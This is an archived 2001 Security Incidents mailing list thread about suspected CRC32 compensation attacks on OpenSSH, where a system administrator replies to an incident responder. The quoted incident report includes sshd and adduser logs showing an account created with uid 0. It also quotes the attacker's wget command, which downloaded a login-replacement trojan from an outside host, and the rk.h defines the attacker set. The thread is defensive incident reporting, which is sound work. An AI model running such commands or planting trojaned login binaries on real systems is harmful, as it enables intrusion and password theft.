Security Incidents mailing list archives
Re: Attacks against SSH?
From: "Armando B. Ortiz" <aortiz () onlinetraffic com>
Date: 03 Dec 2001 11:20:56 -0800
Per se, I have not seen anyone attacking my systems in general via SSH, but I only allow limited access to my servers via any type of remote login facility. Firewalling your SSH and only allowing connections into it that you want might help to curb some of the attacks people are seeing. It's not very difficult to do...just takes a little time. On Sun, 2001-12-02 at 23:30, johan.augustsson () adm gu se wrote:
I stumbeled over this post at openssh-unix-dev mailinglist last week - http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=100701808712180&w=2 The poster claims that he had OpenSSH-2.9p2-8.7 (latest uppdate for RedHat 7.0) up and running when he received what looks to be a CRC32-attack. A few minutes later you can see (he posted parts of the logfile) a new user being created with uid=0 and then how an connection is made from system in Israel. There has been no confirmation about what he writes but I recieved the following mail as an answer of my questions. ------ Message ------ I posted an openssh security alert earlier today and already got some responses. Thanks for everything. Instead of replying to everyone individually I composed the details of the attack. +++ It does not look like a job of worms. Snort did not detect mass port scan from attacker's ip address. It seems that he (I assumed, so I don't have to type he/she all the way) just wants to gain access through openssh. The server is running Red Hat 7.0. With all packages up to date. The following daemons are running: wu-ftpd, apache, telnet, openssh, named I never access the system via telnet, it is there just for backup purpose.Nov 25 11:37:40 ns sshd[10994]: Disconnecting: crc32 compensationattack:network attack detected Nov 25 11:37:48 ns sshd[11006]: Disconnecting: Corrupted check bytes on input. Nov 25 11:37:53 ns sshd[11013]: Disconnecting: Corrupted check bytes on input. Nov 25 11:37:54 ns sshd[11014]: Disconnecting: Corrupted check bytes on input. Nov 25 11:40:00 ns CROND[11022]: (root) CMD ( /sbin/rmmod -as) Nov 25 11:40:08 ns adduser[11023]: new group: name=mattanl, gid=528 Nov 25 11:40:08 ns adduser[11023]: new user: name=mattanl, uid=528,gid=528,home=/home/mattanl, shell=/bin/bash Nov 25 11:40:27 ns adduser[11027]: new group: name=mattan, gid=529 Nov 25 11:40:27 ns adduser[11027]: new user: name=mattan, uid=0,gid=529,home=/home/mattan, shell=/bin/bashAfter the attacker gained root access. He created two users mattan and mattanl. He then downloaded a package: wget http://home.dal.net/resolve/login.tgz. The target site has been compromised. (hacked by a hacker group in Israel) This is a login replacement package, it logs the user id and passwords. He modified rk.h to: #define MY_LOGFILE "/dev/ttypz" #define MY_PASSWORD "1245890" After he complied and installed the login replacement. Something went wrong. /bin/login was zero bytes in length. So when he came back using telnet, he was denied of access. I also disabled sshd and kept one session open for remote control after found login was replaced. I md5 checked the system against a good backup, nothing else was altered. I will try to sniff all packets come to my this server on ssh port. If he attempts to crack the server again, I will have more details. But I guess I will have to turn the server back on. Thanks for all you time ------ End of message ------ I had some further questions so I mailed the guy once again but has not recieved any answer. So, to he main question. Has anyone else had a system compromised by the CRC32-attack when running a version of sshd that is believed to be secure? OpenSSH-2.3.0 or later, SSH 1.2.32 or later. /Johan Augustsson -------------------------------------------------------------------- Johan Augustsson Phone: +46 (0)31 773 1000 Incident Response Team Fax: +46 (0)31 773 1087 Göteborg University E-mail: Johan.Augustsson () adm gu se Sweden -------------------------------------------------------------------- ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
-- ----------------------------------------------------------------- From the Linux Box of Armando Ortiz System Administrator OnLineTraffic.com Email: aortiz () onlinetraffic com Download my public key from: ftp://209.185.214.98/pub/pubkeys/aortiz () onlinetraffic com pub or retrieve it from http://www.keyserver.net as aortiz () onlinetraffic com (Public Key expires 01/04/2002) All emails from me are signed by this public key. -----------------------------------------------------------------
Attachment:
_bin
Description:
Current thread:
- Re: Attacks against SSH?, (continued)
- Re: Attacks against SSH? Jason Baker (Dec 04)
- Re: Attacks against SSH? Michal Zalewski (Dec 04)
- Re: Attacks against SSH? Russell Fulton (Dec 04)
- Re: Attacks against SSH? Przemyslaw Frasunek (Dec 05)
- Re: Attacks against SSH? f.johan.beisser (Dec 04)
- SSH1 CRC32 Compensation Attacks Armando B. Ortiz (Dec 10)
- Re: SSH1 CRC32 Compensation Attacks Andreas Östling (Dec 10)
- Re: SSH1 CRC32 Compensation Attacks Armando Ortiz (Dec 10)
- Re: Attacks against SSH? Steven S (Dec 03)
- Re: Attacks against SSH? Adam Manock (Dec 04)
- Message not available
- Message not available
- Re: Attacks against SSH? johan . augustsson (Dec 06)
- Re: Attacks against SSH? David Chin (Dec 05)
- Re: Attacks against SSH? Skip Carter (Dec 05)
- Re: Attacks against SSH? Skip Carter (Dec 06)